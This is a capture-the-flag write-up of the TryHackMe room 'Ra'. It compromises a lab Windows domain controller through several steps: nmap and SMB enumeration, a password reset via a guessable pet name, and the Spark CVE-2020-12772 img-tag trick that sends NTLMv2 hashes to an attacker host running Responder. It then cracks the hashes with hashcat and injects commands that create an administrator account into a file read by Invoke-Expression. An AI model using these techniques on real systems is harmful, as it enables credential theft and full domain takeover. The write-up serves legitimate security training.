THM Writeup: Ra

Hacktivities
Published in InfoSec Write-ups
11 min read · May 2, 2022


Ra God of Gods.

In this article, I step through the process of exploiting a domain controller by enumerating services running on open ports, abusing a password reset function on a website, and elevating my privileges on the domain controller using CVE-2020-12772 to gather all the challenge flags. This challenge is available on the TryHackMe platform and is titled “Ra”, created by the users “4ndr34z” and “demoteaching”.

Disclaimer

I like to add a brief disclaimer before a writeup to encourage people to attempt the room before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the challenge more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, let's get started!

Challenge Description

You have gained access to the internal network of WindCorp, the multibillion dollar company, running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).

Next step would be to take their crown jewels and get full access to their internal network. You have spotted a new Windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?

Port Enumeration

I started enumerating the target machine by performing a quick scan with NMAP to identify any open ports.

nmap -T5 --open -sS -vvv --min-rate=300 --max-retries=3 -p- -oN all-ports-nmap-report -Pn 10.10.241.18

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 125
80/tcp    open  http             syn-ack ttl 125
88/tcp    open  kerberos-sec     syn-ack ttl 125
135/tcp   open  msrpc            syn-ack ttl 125
139/tcp   open  netbios-ssn      syn-ack ttl 125
389/tcp   open  ldap             syn-ack ttl 125
445/tcp   open  microsoft-ds     syn-ack ttl 125
464/tcp   open  kpasswd5         syn-ack ttl 125
593/tcp   open  http-rpc-epmap   syn-ack ttl 125
636/tcp   open  ldapssl          syn-ack ttl 125
2179/tcp  open  vmrdp            syn-ack ttl 125
3268/tcp  open  globalcatLDAP    syn-ack ttl 125
3269/tcp  open  globalcatLDAPssl syn-ack ttl 125
3389/tcp  open  ms-wbt-server    syn-ack ttl 125
5223/tcp  open  hpvirtgrp        syn-ack ttl 125
5229/tcp  open  jaxflow          syn-ack ttl 125
5262/tcp  open  unknown          syn-ack ttl 125
5263/tcp  open  unknown          syn-ack ttl 125
5269/tcp  open  xmpp-server      syn-ack ttl 125
5270/tcp  open  xmp              syn-ack ttl 125
5275/tcp  open  unknown          syn-ack ttl 125
5276/tcp  open  unknown          syn-ack ttl 125
5985/tcp  open  wsman            syn-ack ttl 125
7070/tcp  open  realserver       syn-ack ttl 125
7443/tcp  open  oracleas-https   syn-ack ttl 125
7777/tcp  open  cbt              syn-ack ttl 125
9090/tcp  open  zeus-admin       syn-ack ttl 125
9091/tcp  open  xmltec-xmlmail   syn-ack ttl 125
9389/tcp  open  adws             syn-ack ttl 125
49671/tcp open  unknown          syn-ack ttl 125
49672/tcp open  unknown          syn-ack ttl 125
49673/tcp open  unknown          syn-ack ttl 125
49674/tcp open  unknown          syn-ack ttl 125
49694/tcp open  unknown          syn-ack ttl 125
49894/tcp open  unknown          syn-ack ttl 125

Reviewing the output, I can see that there are thirty-five ports open. I next used NMAP to identify the services running on each port and ran its default NSE scripts to look for common vulnerabilities that I could exploit.

nmap -sV -sC -Pn -v -oN nmap-report -p 53,80,88,135,139,389,445,464,593,636,2179,3268,3269,3389,5223,5229,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9090,9091,9389,49671,49672,49673,49674,49694,49894 10.10.215.202

I can see a lot of output from NMAP and some interesting services that I can further enumerate.

Web Enumeration

Reviewing the output from the NMAP service scan, I can see a website is accessible on port 80.

80/tcp    open     http                Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Windcorp.

I also noted that NMAP had found useful information while scanning port 3389 about some potential domains.

3389/tcp  open     ms-wbt-server       Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2022-03-27T10:03:02+00:00
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Issuer: commonName=Fire.windcorp.thm

I added windcorp.thm to my hosts file and navigated to the website. I identified a password reset link on the website, which required me to add an additional subdomain called fire.windcorp.thm to my hosts file.

New subdomain identified through password reset link.

Once the subdomain was added to my hosts file, I can see the password reset requires me to submit a valid username and answer a security question.

Password reset popup window.

I found a list of IT Support Staff on the website but I did not have any luck trying to reset their passwords.

List of IT Support Staff on the website.

Attempting to navigate to any of the support staff links throws an error.

Failed to open URI.

I noted that under the list of support staff was a link to Spark, which according to their project webpage:

Spark is an Open Source, cross-platform IM client optimized for businesses and organizations. It features built-in support for group chat, telephony integration, and strong security. It also offers a great end-user experience with features like in-line spell checking, group chat room bookmarks, and tabbed conversations. Combined with the Openfire server, Spark is the easiest and best alternative to using un-secure public IM networks.

I could see from the NMAP scan output that the Openfire Admin Console was accessible over port 9090, but I did not have any luck attempting to log in.

Openfire Administration Console.

I also tried fuzzing for any hidden directories with FFuF but did not find anything of interest. After spending some more time enumerating, I noticed that three employees were pictured at the bottom of the page and, interestingly, one of them was holding a dog.

Windcorp Employees.

One of the security questions asked when resetting a password is to provide the name of your favorite pet. Opening the image in a new tab, I can see that the image's filename includes the owner's username and her pet's name.

Username and Pet’s name.

I can now reset the password of the user lilyle.

Password reset for user lilyle.

SMB Enumeration

Previously, I had not been able to enumerate any SMB shares but now I could use lilyle’s credentials to gain access.

smbclient -L //10.10.215.202 -U lilyle
Enter WORKGROUP\lilyle's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Shared          Disk
        SYSVOL          Disk      Logon server share
        Users           Disk

The SMB shares called Shared and Users were interesting to note. Looking inside the Shared share, I found the first flag and several Spark installation packages for different platforms.

smbclient //10.10.6.185/Shared -U lilyle

smb: \> dir
  .                                   D         0  Sat May 30 01:45:42 2020
  ..                                  D         0  Sat May 30 01:45:42 2020
  Flag 1.txt                          A        45  Fri May  1 16:32:36 2020
  spark_2_8_3.deb                     A  29526628  Sat May 30 01:45:01 2020
  spark_2_8_3.dmg                     A  99555201  Sun May  3 12:06:58 2020
  spark_2_8_3.exe                     A  78765568  Sun May  3 12:05:56 2020
  spark_2_8_3.tar.gz                  A 123216290  Sun May  3 12:07:24 2020

Flag 1.

In the Users share, I can see the profile folders of all the different users set up on the domain controller.

  .                                  DR        0  Sat May  2 23:05:58 2020
  ..                                 DR        0  Sat May  2 23:05:58 2020
  Administrator                       D        0  Sun May 10 12:18:11 2020
  All Users                       DHSrn        0  Sat Sep 15 08:28:48 2018
  angrybird                           D        0  Fri May  1 13:59:20 2020
  berg                                D        0  Fri May  1 13:59:20 2020
  bluefrog579                         D        0  Fri May  1 13:59:20 2020
  brittanycr                          D        0  Sun May  3 00:36:46 2020
  brownostrich284                     D        0  Fri May  1 13:59:20 2020
  buse                                D        0  Sun Mar 27 18:20:18 2022
  Default                           DHR        0  Fri May  1 00:35:11 2020
  Default User                    DHSrn        0  Sat Sep 15 08:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 08:16:48 2018
  edward                              D        0  Fri May  1 13:59:20 2020
  freddy                              D        0  Sun May  3 00:30:16 2020
  garys                               D        0  Fri May  1 13:59:20 2020
  goldencat416                        D        0  Sun Mar 27 19:21:06 2022
  goldenwol                           D        0  Fri May  1 13:59:20 2020
  happ                                D        0  Fri May  1 13:59:20 2020
  happyme                             D        0  Fri May  1 13:59:20 2020
  Luis                                D        0  Fri May  1 13:59:20 2020
  orga                                D        0  Fri May  1 13:59:20 2020
  organicf                            D        0  Fri May  1 13:59:20 2020
  organicfish718                      D        0  Sun Mar 27 19:21:59 2022
  pete                                D        0  Fri May  1 13:59:20 2020
  Public                             DR        0  Thu Apr 30 15:35:47 2020
  purplecat                           D        0  Fri May  1 13:59:20 2020
  purplepanda                         D        0  Fri May  1 13:59:20 2020
  sadswan                             D        0  Fri May  1 13:59:20 2020
  sadswan869                          D        0  Sun Mar 27 19:23:23 2022
  sheela                              D        0  Fri May  1 13:59:20 2020
  silver                              D        0  Fri May  1 13:59:20 2020
  smallf                              D        0  Fri May  1 13:59:20 2020
  spiff                               D        0  Fri May  1 13:59:20 2020
  tinygoos                            D        0  Fri May  1 13:59:20 2020
  whiteleopard                        D        0  Fri May  1 13:59:20 2020

Spark Exploit (CVE-2020-12772)

I can see that Spark version 2.8.3 was installed. Performing a quick search for exploits related to this version, I found a GitHub page created by the challenge designers that outlines a vulnerability in Spark version 2.8.3. According to the vulnerability description provided on the GitHub page:

When we opened a chat with another user, we could send an <img tag to that user with an external URL as the source of that image, like this:

<img src=[external_ip]/test.img>

Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!

By running responder, we could capture the hashes and use them to gain access to the user account and escalate our privileges (depending on the user of course).

To exploit this vulnerability, I started by downloading, installing and running the Spark 2.8.3 application.

sudo dpkg -i spark_2_8_3.deb

After launching Spark, I provided the credentials and domain details.

Spark Login.

I also needed to go into advanced settings and check two boxes to avoid getting a certificate error.

Spark Advanced Settings.

While enumerating the website earlier, I had noted that the icon for the user Buse Candan was always green, while the other users' icons fluctuated between grey and amber. I assumed that this indicated the user was active and could be targeted with the exploit.

Active user.

I searched for Buse in contacts on the Spark app and opened a chat window.

Spark chat with buse.

Next, I started up Responder to capture the NTLMv2 hash for the user Buse and use it to gain access to the user's account, thus escalating my privileges.

Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

python3 /usr/share/responder/Responder.py -I tun0 -rdwv

Next, I sent the image tag to the user Buse, as seen below.

Image Tag.

Responder captures the GET request from the user Buse to our external host, which includes the user’s NTLMv2 hash!

Responder captures NTLMv2 Hash for user Buse twice.

Finally, I can use hashcat to crack the NTLMv2 hash and retrieve the password for the user Buse.

hashcat64.exe -m 5600 hash.txt rockyou.txt

Cracked NTLMv2 Hash.

Using these credentials, I could now attempt to log in using evil-winrm and get the second flag.

evil-winrm -i windcorp.thm -u buse -p <...........> -N

Flag 2.

Windows Privilege Escalation

I started by performing some basic manual user enumeration and noted that the user Buse is a member of the Account Operators group, which allows its members to add and modify user accounts.

whoami /groups

Group Name                                 Type
========================================== ================
Everyone                                   Well-known group
BUILTIN\Users                              Alias
BUILTIN\Pre-Windows 2000 Compatible Access Alias
BUILTIN\Account Operators                  Alias
BUILTIN\Remote Desktop Users               Alias
BUILTIN\Remote Management Users            Alias

Continuing my enumeration, I also found a suspicious folder called scripts located in the C drive.

*Evil-WinRM* PS C:\> dir

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/2/2020   6:33 AM                inetpub
d-----        9/15/2018  12:19 AM                PerfLogs
d-r---         5/8/2020   7:43 AM                Program Files
d-----         5/7/2020   2:51 AM                Program Files (x86)
d-----         5/3/2020   5:48 AM                scripts
d-----        5/29/2020   5:45 PM                Shared
d-r---         5/2/2020   3:05 PM                Users
d-----        5/30/2020   7:00 AM                Windows

The scripts folder contained a PowerShell script called checkservers.ps1, which reads a file called hosts.txt located in C:\Users\brittanycr\ and passes its contents to Invoke-Expression.

PowerShell Script snippet.

If I can modify the hosts.txt file and include a command to add a new user, it will be executed as Administrator. To achieve this, I can reset the password of the user brittanycr, since buse is a member of the Account Operators group.
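As a defensive aside, here is how the checkservers.ps1 pattern can be hardened. This is an added example, not the room's script: it assumes the script runs as a privileged scheduled task, that hosts.txt holds one hostname per line, and that the original pinged each entry through Invoke-Expression. Input lines are validated as hostnames and passed to Test-Connection as a parameter, and the script refuses to run while the file is writable by anyone other than SYSTEM or Administrators.

```powershell
# Hardened check-servers script (added example, not the room's checkservers.ps1).
# Assumptions: runs as a privileged scheduled task, hosts.txt holds one hostname
# per line, and the original pinged each entry via Invoke-Expression.
param(
    [string]$HostsFile = 'C:\Users\brittanycr\hosts.txt'
)

# 1. A privileged script must not consume a file that low-privileged users can
#    edit. Abort if any Allow ACE grants write access to an untrusted principal.
$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
$acl = Get-Acl -Path $HostsFile
foreach ($ace in $acl.Access) {
    $rights   = [int]$ace.FileSystemRights
    $canWrite = (($rights -band [int][System.Security.AccessControl.FileSystemRights]::Write) -ne 0) -or
                (($rights -band 0x50000000) -ne 0)   # GENERIC_WRITE | GENERIC_ALL on some inherited ACEs
    if ($ace.AccessControlType -eq 'Allow' -and $canWrite -and
        $trusted -notcontains $ace.IdentityReference.Value) {
        throw "Refusing to run: $HostsFile is writable by $($ace.IdentityReference.Value)"
    }
}

# 2. Accept only syntactically valid hostnames (RFC 1123 labels, max 253 chars).
#    A line containing ';', spaces or other shell syntax fails this and is skipped.
$hostPattern = '^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$'

Get-Content -Path $HostsFile | ForEach-Object {
    $name = $_.Trim()
    if ($name -eq '') { return }
    if ($name -notmatch $hostPattern) {
        Write-Warning "Skipping invalid host entry: '$name'"
        return
    }
    # 3. Pass the value as a cmdlet parameter. Nothing from the file is ever
    #    interpolated into a string that gets executed as PowerShell code.
    if (Test-Connection -ComputerName $name -Count 1 -Quiet) {
        Write-Output "$name is up"
    } else {
        Write-Output "$name is down"
    }
}
```

With the file owned by a regular user, as on this box, the ACL check alone stops the script, which is the intended failure mode: a privileged task should not silently trust user-writable input.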

*Evil-WinRM* PS C:\scripts> net user brittanycr SecretPass1234 /domain
The command completed successfully.

I was not able to use evil-winrm to establish a remote connection as the brittanycr user. Earlier, I had noted that it was possible to access the Users folder through SMB. I created a new hosts.txt file and included a command that, when executed, would add a new user called hacktivities.

; net user hacktivities Pass1234$ /add; net localgroup Administrators hacktivities /add

Next, I used smbclient to connect to the Users share with brittanycr’s credentials and uploaded the new hosts.txt file from my attacking machine.

smbclient //10.10.252.35/Users -U brittanycr
smb: \> cd brittanycr\
smb: \brittanycr\> dir
  .                                   D        0  Sun May  3 00:36:46 2020
  ..                                  D        0  Sun May  3 00:36:46 2020
  hosts.txt                           A       22  Sun May  3 14:44:57 2020
smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.1 kb/s) (average 0.1 kb/s)

To check whether the user hacktivities has been added, I can use crackmapexec to verify that the account exists.

crackmapexec smb windcorp.thm -u hacktivities -p Pass1234$

Account successfully added.

I can see that the account is successfully added. I can now use evil-winrm to login and retrieve the final flag.

Flag 3.

Final Thoughts

I really enjoyed working through this room and getting the opportunity to learn more about exploiting an Active Directory domain controller. The challenge had a nice progression and required good enumeration skills to complete. Thank you for reading till the end and keep hacking 😄!
